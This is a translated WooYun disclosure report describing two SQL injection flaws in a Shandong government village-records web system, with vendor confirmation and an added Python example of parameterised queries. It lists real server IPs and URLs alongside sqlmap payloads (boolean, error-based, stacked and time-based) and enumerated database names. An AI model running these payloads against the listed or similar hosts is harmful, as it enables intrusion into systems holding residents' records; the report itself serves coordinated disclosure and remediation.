Vulnerability summary

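Bug ID: wooyun-2015-089525

Title: Two SQL injection points in a government system (bundled report)

Vendor: Shandong Nongyou Software (山东农友软件)

Author: 路人甲

Submitted: 2015-01-05 15:50

Fixed: 2015-04-05 15:52

Disclosed: 2015-04-05 15:52

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]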


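Vulnerability details

Disclosure status:

2015-01-05: Details sent to the vendor; awaiting vendor handling
2015-01-09: Vendor has confirmed; details disclosed to the vendor only
2015-01-12: Details opened to third-party security partners
2015-03-05: Details disclosed to core white hats and experts in related fields
2015-03-15: Details disclosed to regular white hats
2015-03-25: Details disclosed to trainee white hats
2015-04-05: Details disclosed to the public

Brief description:

As per the title.

Detailed description:

Official website of Shandong Nongyou Software: http://www.nongyou.com.cn/
Both parameters, tname and CountryName, are injectable.
Example instances: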
http://218.56.99.84:8003/newSymSum/VillagePersonal2.aspx?tname=太河镇&CountryName=东同古村
http://222.135.109.70:8200/newSymSum/VillagePersonal2.aspx?tname=泽库镇&CountryName=辛立庄村
http://123.134.189.60:8022/newSymSum/VillagePersonal2.aspx?tname=牛泉镇&CountryName=西泉河
http://222.135.76.147:8200/newSymSum/VillagePersonal2.aspx?tname=斥山办事处&CountryName=西苏家村
http://218.58.124.131:8003/newSymSum/VillagePersonal2.aspx?tname=中央商务片区&CountryName=魏家社区
http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村
1. Injection point tested: http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: tname
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tname=???' AND 3360=3360 AND 'AunX'='AunX&CountryName=????
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: tname=???' AND (SELECT 4079 FROM(SELECT COUNT(*),CONCAT(0x7175657371,(SELECT (CASE WHEN (4079=4079) THEN 1 ELSE 0 END)),0x716f676a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MnDW'='MnDW&CountryName=????
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: tname=???'; SELECT SLEEP(5)-- &CountryName=????
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: tname=???' AND SLEEP(5) AND 'nhiY'='nhiY&CountryName=????
---
[16:41:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
[16:41:05] [INFO] fetching database names
[16:41:35] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[16:41:43] [INFO] the SQL query used returns 5503 entries
[16:42:12] [WARNING] user aborted during enumeration. sqlmap will display partial output
available databases [56]:


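More than 5,000 tables, so I did not enumerate any further.
I only tested this one; the others can all be reproduced.
-------------------------------------------------------------------
Second injection point: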
http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村
http://222.135.76.147:8200/newSymSum/VillagePersonal3.aspx?tname=港西镇&CountryName=山后鞠家村
http://60.217.72.17:7081/newSymSum/VillagePersonal3.aspx?tname=新市镇&CountryName=王大褂村
http://222.135.109.70:8200/newSymSum/VillagePersonal3.aspx?tname=龙山办事处&CountryName=西楼
http://218.56.40.229:8053/newSymSum/VillagePersonal3.aspx?tname=城港路街道&CountryName=三间房
http://221.2.149.47:8200/newSymSum/VillagePersonal3.aspx?tname=滕家镇&CountryName=曹家沟
1. Injection point tested: http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: tname
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tname=??????????' AND 7785=7785 AND 'FAej'='FAej&CountryName=???
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: tname=??????????' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x7162797171,(SELECT (CASE WHEN (8399=8399) THEN 1 ELSE 0 END)),0x716f617271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ovog'='Ovog&CountryName=???
Type: stacked queries
Title: MySQL < 5.0.12 stacked queries (heavy query)
Payload: tname=??????????'; SELECT BENCHMARK(5000000,MD5(0x72546e68))-- &CountryName=???
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: tname=??????????' AND 2926=BENCHMARK(5000000,MD5(0x71496377)) AND 'qbiT'='qbiT&CountryName=???
---
[16:47:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
[16:47:55] [INFO] fetching database names
[16:47:55] [INFO] the SQL query used returns 17 entries
available databases [17]:
[*] cw_databasecomm0517
[*] cw_databasecomm22zbgaoxin
[*] cw_databasecommxh
[*] cw_databasezbgx
[*] cwdbcommzbgx100001
[*] cwdbcommzbgx100002
[*] cwdbcommzbgx100003
[*] cwdbcommzbgx100004
[*] cwdbcommzbgx100005
[*] cwdbcommzbgx100007
[*] information_schema
[*] mysql
[*] nl_zbgaoxin
[*] ny_landgxlz
[*] test
[*] village-levelmajor33zbgaoxin
[*] village-levelmajor33zbgaoxinqu


All of the above can be reproduced.

Proof of vulnerability:


Remediation:

Parameter filtering
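
A way to close this class of bug at the query layer is to bind tname and CountryName as parameters instead of concatenating them into the SQL text. The following is an added example, not the vendor's code: it uses an in-memory SQLite database as a stand-in for the MySQL back end, and the table `villagers`, its columns and the sample rows are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample rows; the table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE villagers (town TEXT, village TEXT, name TEXT)")
    db.executemany("INSERT INTO villagers VALUES (?, ?, ?)", [
        ("town-a", "village-1", "resident-1"),
        ("town-a", "village-2", "resident-2"),
        ("town-b", "village-3", "resident-3"),
    ])
    return db

def lookup_concatenated(db, tname, country_name):
    # Vulnerable pattern: request values are pasted into the SQL text, so a
    # single quote in tname closes the literal and the rest is parsed as SQL.
    sql = ("SELECT name FROM villagers WHERE town = '" + tname +
           "' AND village = '" + country_name + "'")
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, tname, country_name):
    # Hardened pattern: both values are bound parameters and stay data.
    sql = "SELECT name FROM villagers WHERE town = ? AND village = ?"
    return [row[0] for row in db.execute(sql, (tname, country_name))]

def differs_under_probe(lookup, db, tname, country_name):
    # Regression check in the shape of the boolean-based test in the sqlmap
    # output: append an always-true and an always-false condition to tname.
    # Different results mean the input reached the SQL parser.
    when_true = lookup(db, tname + "' AND 1=1 AND 'a'='a", country_name)
    when_false = lookup(db, tname + "' AND 1=2 AND 'a'='a", country_name)
    return when_true != when_false

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concatenated, lookup_bound):
        print(fn.__name__, "injectable:",
              differs_under_probe(fn, db, "town-a", "village-1"))
```

The same check can run in a test suite against the real data-access function, so that a later change back to string concatenation fails the build.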

Copyright notice: when reposting, credit the source 路人甲@乌云 (WooYun)


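Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-01-09 18:28

Vendor reply:

CNVD confirmed and reproduced the situation described. It has been passed via CNCERT to the Shandong sub-center, which will coordinate follow-up handling with the organisations that administer the websites.

Latest status:

None yet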

